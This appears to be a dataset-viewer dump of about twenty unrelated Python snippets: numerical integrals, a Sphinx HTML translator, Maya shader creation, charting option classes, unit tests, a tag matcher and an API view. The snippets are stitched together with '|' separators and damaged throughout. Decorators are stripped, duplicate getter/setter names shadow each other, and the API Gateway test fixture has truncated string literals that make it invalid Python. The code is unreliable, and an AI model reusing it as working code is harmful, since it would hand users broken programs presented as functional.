x2 = ((- x1) * ((ax * A[0]) + (bx * B[0])))
x3 = (x2 + C[0])
x4 = (cx + x0)
x5 = (x4 ** (- 1.0))
x6 = ((- x1) * ((ax * A[1]) + (bx * B[1])))
x7 = (x6 + C[1])
x8 = ((- x1) * ((ax * A[2]) + (bx * B[2])))
x9 = (x8 + C[2])
x10 = (((cx * x0) * x5) * (((x3 ** 2) + (x7 ** 2)) + (x9 ** 2)))
x11 = (x5 * boys(2, x10))
x12 = (cx ** (- 1.0))
x13 = boys(1, x10)
x14 = ((((- 2.0) * x11) * x3) + (((2.0 * x12) * x13) * (x2 + A[0])))
x15 = ((x1 * x12) * x13)
x16 = (((((17. * da) * db) * dc) * (x4 ** (- 1.5))) * numpy.exp(((((- ax) * bx) * x1) * ((((A[0] - B[0]) ** 2) + ((A[1] - B[1]) ** 2)) + ((A[2] - B[2]) ** 2)))))
x17 = (x14 * x16)
x18 = ((((- 2.0) * x11) * x7) + (((2.0 * x12) * x13) * (x6 + A[1])))
x19 = (x16 * x18)
x20 = ((((- 2.0) * x11) * x9) + (((2.0 * x12) * x13) * (x8 + A[2])))
x21 = (x16 * x20)
result[(0, 0, 0)] = numpy.sum((x16 * ((x14 * x3) + x15)))
result[(0, 0, 1)] = numpy.sum((x17 * x7))
result[(0, 0, 2)] = numpy.sum((x17 * x9))
result[(1, 0, 0)] = numpy.sum((x19 * x3))
result[(1, 0, 1)] = numpy.sum((x16 * (x15 + (x18 * x7))))
result[(1, 0, 2)] = numpy.sum((x19 * x9))
result[(2, 0, 0)] = numpy.sum((x21 * x3))
result[(2, 0, 1)] = numpy.sum((x21 * x7))
result[(2, 0, 2)] = numpy.sum((x16 * (x15 + (x20 * x9))))
return result |
class FiresiteHTMLTranslator(html.HTMLTranslator):
def __init__(self, builder, *args, **kwds):
html.HTMLTranslator.__init__(self, builder, *args, **kwds)
self.current_section = 'intro'
self.insert_header = False
def visit_desc(self, node):
if (node.parent.tagname == 'section'):
self.insert_header = True
if (node['desctype'] != self.current_section):
self.body.append(f"<h2>{_DESCTYPE_NAMES[node['desctype']]}</h2>")
self.current_section = node['desctype']
if (node['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc(self, node)
else:
self.body.append(self.starttag(node, 'table', CLASS=node['objtype']))
def depart_desc(self, node):
if (node['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc(self, node)
else:
self.body.append('</table>\n\n')
def visit_desc_signature(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc_signature(self, node)
else:
self.body.append('<tr>')
self.body.append(self.starttag(node, 'th'))
if self.insert_header:
self.body.append(f"""<h3 class="sphinx-hidden">{node['fullname']}</h3>""")
self.insert_header = False
def depart_desc_signature(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc_signature(self, node)
else:
self.body.append('</th></tr>')
def visit_desc_content(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.visit_desc_content(self, node)
else:
self.body.append('<tr>')
self.body.append(self.starttag(node, 'td'))
def depart_desc_content(self, node):
if (node.parent['desctype'] in _RENDER_WITH_DEFAULT):
html.HTMLTranslator.depart_desc_content(self, node)
else:
self.body.append('</td></tr>')
def visit_title(self, node):
if (node.parent.tagname == 'section'):
self.body.append('<h1 class="page-title">')
else:
html.HTMLTranslator.visit_title(self, node)
def depart_title(self, node):
if (node.parent.tagname == 'section'):
self.body.append('</h1>')
else:
html.HTMLTranslator.depart_title(self, node)
def visit_note(self, node):
self.body.append(self.starttag(node, 'aside', CLASS='note'))
def depart_note(self, node):
self.body.append('</aside>\n\n')
def visit_warning(self, node):
self.body.append(self.starttag(node, 'aside', CLASS='caution'))
def depart_warning(self, node):
self.body.append('</aside>\n\n') |
def create_shader(shader_tree, name=None):
shader_type = shader_tree['type']
if ('class' in shader_tree):
class_ = shader_tree['class']
else:
class_ = 'asShader'
shader = pm.shadingNode(shader_type, **{class_: 1})
if name:
shader.rename(name)
attributes = shader_tree['attr']
for key in attributes:
value = attributes[key]
if isinstance(value, dict):
node = create_shader(value)
output_attr = value['output']
(node.attr(output_attr) >> shader.attr(key))
else:
shader.setAttr(key, value)
return shader |
class OptionSeriesVectorPointEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
class PCSFeature(Enum):
PCS_DUMMY = 'pcs_dummy_feature'
PRIVATE_LIFT_PCF2_RELEASE = 'private_lift_pcf2_release'
PC_COORDINATED_RETRY = 'private_computation_coordinated_retry'
PRIVATE_LIFT_UNIFIED_DATA_PROCESS = 'private_lift_unified_data_process'
PCS_PRIVATE_LIFT_DECOUPLED_UDP = 'pcs_private_lift_decoupled_udp'
PRIVATE_ATTRIBUTION_MR_PID = 'private_attribution_with_mr_pid'
SHARD_COMBINER_PCF2_RELEASE = 'shard_combiner_pcf2_release'
NUM_MPC_CONTAINER_MUTATION = 'num_mpc_container_mutation'
PID_SNMK_LARGER_CONTAINER_TYPE = 'pid_snmk_larger_container_type'
PCF_TLS = 'pcf_tls'
PA_TIMESTAMP_VALIDATION = 'pa_timestamp_validation'
PL_TIMESTAMP_VALIDATION = 'pl_timestamp_validation'
PRE_VALIDATION_FILE_STREAM = 'pre_validation_file_stream'
PID_FILTER_LOW_QUALITY_IDENTIFIER_THRESH166 = 'pid_filter_low_quality_identifier_thresh166'
PUBLISHER_PC_PRE_VALIDATION = 'publisher_pc_pre_validation'
PARTNER_PC_PRE_VALIDATION = 'partner_pc_pre_validation'
PRIVATE_ATTRIBUTION_REFORMATTED_OUTPUT = 'private_attribution_reformatted_output'
PRIVATE_COMPUTATION_TRANSLATOR = 'private_computation_translator'
UNKNOWN = 'unknown'
def _missing_(cls, value: object) -> 'PCSFeature':
for member in cls:
if (str(value).casefold() in [member.value.casefold(), member.name.casefold()]):
return member
return PCSFeature.UNKNOWN
def from_str(feature_str: str) -> 'PCSFeature':
if (len(feature_str) <= 1):
raise ValueError('Features of length <= 1 not supported. Check your config')
feature_str = feature_str.casefold()
try:
return PCSFeature(feature_str)
except ValueError:
logging.warning(f"can't map {feature_str} to pre-defined PCSFeature")
return PCSFeature.UNKNOWN |
def create_cosmwasm_execute_msg(sender_address: Address, contract_address: Address, args: Any, funds: Optional[str]=None) -> MsgExecuteContract:
msg = MsgExecuteContract(sender=str(sender_address), contract=str(contract_address), msg=json_encode(args).encode('UTF8'))
if (funds is not None):
msg.funds.extend(parse_coins(funds))
return msg |
def monte_carlo_approximate_reparam(observations: RVDict, num_samples: int, discrepancy_fn: DiscrepancyFn, params: Mapping[(RVIdentifier, torch.Tensor)], queries_to_guides: Mapping[(RVIdentifier, RVIdentifier)], subsample_factor: float=1.0, device: torch.device=_CPU_DEVICE) -> torch.Tensor:
loss = torch.zeros(1).to(device)
for _ in range(num_samples):
variational_world = VariationalWorld.initialize_world(queries=queries_to_guides.values(), observations=observations, initialize_fn=(lambda d: d.rsample()), params=params, queries_to_guides=queries_to_guides)
world = World.initialize_world(queries=[], observations={**{query: variational_world[guide] for (query, guide) in queries_to_guides.items()}, **observations})
logu = ((world.log_prob(queries_to_guides.keys()) + ((1.0 / subsample_factor) * world.log_prob(observations.keys()))) - variational_world.log_prob(queries_to_guides.values()))
loss += discrepancy_fn(logu)
return (loss / num_samples) |
.parametrize('ownership_range,num_components', [((6, 27), 3), ((6, 17), 4)])
def test_interlaced_vel_dof_order(ownership_range, num_components):
interlaced = LS.InterlacedDofOrderType()
num_equations = ((ownership_range[1] - ownership_range[0]) + 1)
(global_IS, vel_IS) = interlaced.create_vel_DOF_IS(ownership_range, num_equations, num_components)
for i in range(1, num_components):
global_vals = np.arange((ownership_range[0] + i), (ownership_range[1] + 1), num_components)
assert np.array_equal(global_IS[(i - 1)].array, global_vals)
for i in range(1, num_components):
scaled_ownership_range = ((ownership_range[0] * (num_components - 1)) // num_components)
local_vals = np.arange(start=((scaled_ownership_range + i) - 1), stop=(scaled_ownership_range + int(((num_equations * (num_components - 1)) // num_components))), step=(num_components - 1))
assert np.array_equal(vel_IS[(i - 1)].array, local_vals) |
def get_score(A, B):
bbox_A = get_bbox(A)
bbox_B = get_bbox(B)
if (not is_colliding(bbox_A, bbox_B)):
return (- 1.0)
delta_pos = (bbox_B['center'] - bbox_A['center']).length
volume_A = ((bbox_A['size'].x * bbox_A['size'].y) * bbox_A['size'].z)
volume_B = ((bbox_B['size'].x * bbox_B['size'].y) * bbox_B['size'].z)
delta_vol = ((max(volume_A, volume_B) - min(volume_A, volume_B)) / 3.0)
side_A_max = max(bbox_A['size'].x, bbox_A['size'].y, bbox_A['size'].z)
side_B_max = max(bbox_B['size'].x, bbox_B['size'].y, bbox_B['size'].z)
delta_size_max = abs((side_A_max - side_B_max))
return ((delta_pos + delta_vol) + delta_size_max) |
def test_create_plan_start_model_downstream():
parsed = Namespace(select=['modelA+'])
graph = _create_test_graph()
execution_plan = ExecutionPlan.create_plan_from_graph(parsed, graph, MagicMock(project_name=PROJECT_NAME))
assert (execution_plan.before_scripts == [])
assert (execution_plan.dbt_models == ['model.test_project.modelA'])
assert_contains_only(execution_plan.after_scripts, ['script.model.AFTER.scriptA.py', 'script.model.AFTER.scriptB.py']) |
class OptionPlotoptionsAreasplineSonificationContexttracksMappingTremoloDepth(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class OptionPlotoptionsDependencywheelSonificationContexttracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def test_structure_json(complex_obj):
c = conversion[SerializeFormat.JSON]
uo = c.unstructure(complex_obj)
o = c.structure(uo, ComplexObj)
assert (o.float64_array.dtype == np.float64)
assert (o.float32_array.dtype == np.float32)
assert (o.int32_array.dtype == np.int32)
assert isinstance(o.an_enum, Categories) |
def extractShujinkouCom(item):
if ('Anime' in item['tags']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Isekai Kaeri no Ossan', 'Isekai Kaeri no Ossan wa, Fusei Sukiru de Fathercon Musume-tachi o Tororori ni', 'translated'), ("Let's be an Adventurer", "Let's be an Adventurer", 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
def test_nonans_tesseroid_mask(dummy_layer):
((longitude, latitude), surface, reference, _) = dummy_layer
shape = (latitude.size, longitude.size)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.top[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask)
layer = tesseroid_layer((longitude, latitude), surface, reference)
expected_mask = np.ones(shape, dtype=bool)
for index in ((1, 2), (2, 3)):
layer.top[index] = np.nan
expected_mask[index] = False
for index in ((1, 2), (2, 1), (3, 2)):
layer.bottom[index] = np.nan
expected_mask[index] = False
mask = layer.tesseroid_layer._get_nonans_mask()
npt.assert_allclose(mask, expected_mask) |
class TagSearch(object):
def __init__(self, view, bfr, window, center, pattern, match_type, mode, optional_tags, self_closing_tags, void_tags):
self.start = int(window[0])
self.end = int(window[1])
self.optional_tags = optional_tags
self.void_tags = void_tags
self.self_closing_tags = self_closing_tags
self.center = center
self.pattern = pattern
self.match_type = match_type
self.mode = mode
self.bfr = bfr
self.prev_match = None
self.return_prev = False
self.done = False
self.view = view
settings = sublime.load_settings('bh_tag.sublime-settings')
try:
self.scope_exclude = settings.get('tag_scope_exclude', {}).get(mode, ['string', 'comment'])
except Exception:
self.scope_exclude = ['string', 'comment']
def scope_check(self, pt):
illegal_scope = False
for exclude in self.scope_exclude:
illegal_scope |= bool(self.view.score_selector(pt, exclude))
return illegal_scope
def reset_end_state(self):
self.done = False
self.prev_match = None
self.return_prev = False
def remember(self):
self.return_prev = True
self.done = False
def get_tags(self):
if self.done:
return
if self.return_prev:
self.return_prev = False
(yield self.prev_match)
for m in self.pattern.finditer(self.bfr, self.start, self.end):
name = m.group(1).lower()
if (not self.match_type):
self_closing_slash = bool((m.group(2) != ''))
if ((not self_closing_slash) and (self.optional_tags is not None)):
optional = (self.optional_tags.match(name) is not None)
else:
optional = False
if (self_closing_slash and (self.self_closing_tags is not None)):
self_closing = (self.self_closing_tags.match(name) is not None)
else:
self_closing = False
if ((not optional) and (not self_closing) and (self.void_tags is not None)):
void = (self.void_tags.match(name) is not None)
else:
void = False
else:
if ((self.void_tags is not None) and (self.void_tags.match(name) is not None)):
continue
void = False
optional = False
self_closing = False
start = m.start(0)
end = m.end(0)
if (not self.scope_check(start)):
self.prev_match = TagEntry(start, end, name, optional, (void or self_closing))
self.start = end
(yield self.prev_match)
self.done = True |
class UnsubscribeTest(unittest.TestCase):
('unsubscribe.app.unsubscribe_single_list', side_effect=mocked_unsubscribe_single_list)
('unsubscribe.app.look_up_cognito_id', side_effect=mocked_look_up_cognito_id)
('user_service.query_single_user', side_effect=mocked_query_single_user)
def test_unsubscribe(self, query_single_user_mock, look_up_cognito_id_mock, unsubscribe_single_list_mock):
event_body = {'cognito_id': '', 'email': '', 'character_set_preference': 'simplified', 'list': {'list_id': '123', 'list_name': 'HSK Level 1', 'character_set': 'simplified'}}
response = lambda_handler(self.apig_event(json.dumps(event_body)), '')
self.assertEqual(query_single_user_mock.call_count, 0)
self.assertEqual(look_up_cognito_id_mock.call_count, 1)
self.assertEqual(unsubscribe_single_list_mock.call_count, 1)
('unsubscribe.app.unsubscribe_single_list', side_effect=mocked_unsubscribe_single_list)
('unsubscribe.app.look_up_cognito_id', side_effect=mocked_look_up_cognito_id)
('user_service.query_single_user', side_effect=mocked_query_single_user)
def test_unsubscribe_all(self, query_single_user_mock, look_up_cognito_id_mock, unsubscribe_single_list_mock):
event_body = {'cognito_id': '', 'email': '', 'character_set_preference': 'simplified', 'list': ''}
response = lambda_handler(self.apig_event(json.dumps(event_body)), '')
self.assertEqual(query_single_user_mock.call_count, 1)
self.assertEqual(look_up_cognito_id_mock.call_count, 1)
self.assertEqual(unsubscribe_single_list_mock.call_count, 2)
def apig_event(self, event_body):
return {'resource': '/unsub', 'path': '/unsub', 'body': event_body, ' 'POST', 'headers': {'Accept': 'application/json, text/plain, */*', 'accept-encoding': 'gzip, deflate, br', 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5', 'Authorization': 'eyJraWQiOiJq1231235fOwKv46JpjurGKzvma17eqCoaw', 'CloudFront-Forwarded-Proto': ' 'CloudFront-Is-Desktop-Viewer': 'true', 'CloudFront-Is-Mobile-Viewer': 'false', 'CloudFront-Is-SmartTV-Viewer': 'false', 'CloudFront-Is-Tablet-Viewer': 'false', 'CloudFront-Viewer-Country': 'IE', 'Host': 'api.haohaotiantian.com', 'origin': ' 'Referer': ' 'sec-ch-ua': '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"', 'sec-ch-ua-mobile': '?0', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'cross-site', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'Via': '2.0 f8591238.cloudfront.net (CloudFront)', 'X-Amz-Cf-Id': 'rex4fmbUq5pvK123fj5bGvpw==', 'X-Amzn-Trace-Id': 'Root=1-60e123b7e7b70', 'X-Forwarded-For': '123', 'X-Forwarded-Port': '123', 'X-Forwarded-Proto': ' 'multiValueHeaders': {'Accept': ['application/json, text/plain, */*'], 'accept-encoding': ['gzip, deflate, br'], 'Accept-Language': ['en-US,en;q=0.9,zh-CN;q=0.8,zh-HK;q=0.7,zh-MO;q=0.6,zh;q=0.5'], 'Authorization': ['eyJraWQiOiJqVmhFdEN4Y123vZ25pdG123GKzvma17eqCoaw'], 'CloudFront-Forwarded-Proto': [' 'CloudFront-Is-Desktop-Viewer': ['true'], 'CloudFront-Is-Mobile-Viewer': ['false'], 'CloudFront-Is-SmartTV-Viewer': ['false'], 'CloudFront-Is-Tablet-Viewer': ['false'], 'CloudFront-Viewer-Country': ['IE'], 'Host': ['api.haohaotiantian.com'], 'origin': [' 'Referer': [' 'sec-ch-ua': ['" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"'], 'sec-ch-ua-mobile': ['?0'], 'sec-fetch-dest': ['empty'], 'sec-fetch-mode': ['cors'], 'sec-fetch-site': ['cross-site'], 'User-Agent': ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'], 'Via': ['2.0 123.cloudfront.net (CloudFront)'], 'X-Amz-Cf-Id': ['rex4fmbU123BVnGAOV9sfj5bGvpw=='], 'X-Amzn-Trace-Id': ['Root=1-60e6d123b70'], 'X-Forwarded-For': ['123'], 'X-Forwarded-Port': ['443'], 'X-Forwarded-Proto': [' 'queryStringParameters': 'None', 'multiValueQueryStringParameters': 'None', 'pathParameters': 'None', 'stageVariables': 'None', 'requestContext': {'resourceId': '123', 'authorizer': {'claims': {'sub': '', 'aud': '123123', 'email_verified': 'true', 'event_id': 'cc6a7b68-e1bc-417b-9344-123', 'token_use': 'id', 'auth_time': '', 'iss': ' 'cognito:username': '', 'exp': 'Thu Jul 08 11:38:59 UTC 2021', 'iat': 'Thu Jul 08 10:38:59 UTC 2021', 'email': ''}}, 'resourcePath': '/user_data', ' 'GET', 'extendedRequestId': 'CJZWoF123FT_Q=', 'requestTime': '08/Jul/2021:10:38:59 +0000', 'path': '/user_data', 'accountId': '123', 'protocol': 'HTTP/1.1', 'stage': 'Prod', 'domainPrefix': 'api', 'requestTimeEpoch': 123, 'requestId': '11875c1237fec0aab', 'identity': {'cognitoIdentityPoolId': 'None', 'accountId': 'None', 'cognitoIdentityId': 'None', 'caller': 'None', 'sourceIp': '54', 'principalOrgId': 'None', 'accessKey': 'None', 'cognitoAuthenticationType': 'None', 'cognitoAuthenticationProvider': 'None', 'userArn': 'None', 'userAgent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36', 'user': 'None'}, 'domainName': 'api.haohaotiantian.com', 'apiId': '123'}, 'isBase64Encoded': False}
if (__name__ == '__main__'):
unittest.main() |
(tags=['dates'], description=docs.CALENDAR_DATES)
class CalendarDatesView(ApiResource):
model = models.CalendarDate
schema = schemas.CalendarDateSchema
page_schema = schemas.CalendarDatePageSchema
cap = 500
filter_match_fields = [('event_id', models.CalendarDate.event_id)]
filter_multi_fields = [('calendar_category_id', models.CalendarDate.calendar_category_id)]
filter_fulltext_fields = [('description', models.CalendarDate.description_text), ('summary', models.CalendarDate.summary_text)]
filter_range_fields = [(('min_start_date', 'max_start_date'), models.CalendarDate.start_date), (('min_end_date', 'max_end_date'), models.CalendarDate.end_date)]
def args(self):
return utils.extend(args.paging, args.calendar_dates, args.make_sort_args(default='-start_date'))
def build_query(self, *args, **kwargs):
query = super().build_query(*args, **kwargs)
return query
def index_column(self):
return self.model.event_id |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.